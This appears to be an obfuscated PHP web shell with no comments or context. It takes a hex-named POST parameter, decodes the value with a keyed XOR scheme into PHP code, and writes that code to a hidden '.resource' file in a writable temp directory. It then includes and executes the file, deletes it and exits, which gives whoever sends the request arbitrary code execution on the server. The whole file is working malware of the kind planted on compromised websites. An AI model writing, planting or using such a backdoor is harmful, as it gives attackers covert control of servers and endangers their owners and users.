<?php

if(isset($_POST["\x76\x61l"]) ? true : false){
	$obj = $_POST["\x76\x61l"];
	 	$obj			=explode( 		".", $obj	) ;	 
	$marker ='';
            $s1 ='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen =strlen($s1		);
            $v =0;
    
            foreach ($obj as $v3) {
                $chS =ord($s1[$v % $sLen]		);
                $dec =((int)$v3 - $chS - ($v % 10)) ^ 81;
                $marker.=chr($dec		);
                $v++;	}  
	$pgrp = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", session_save_path(), getcwd(), getenv("TMP"), "/tmp"]);
	while ($element = array_shift($pgrp)) {
    		if (is_writable($element) && is_dir($element)) {
    $value = implode("/", [$element, ".resource"]);
    $file = fopen($value, 'w');
if ($file) {
	fwrite($file, $marker);
	fclose($file);
	include $value;
	@unlink($value);
	exit;
}
}
}
}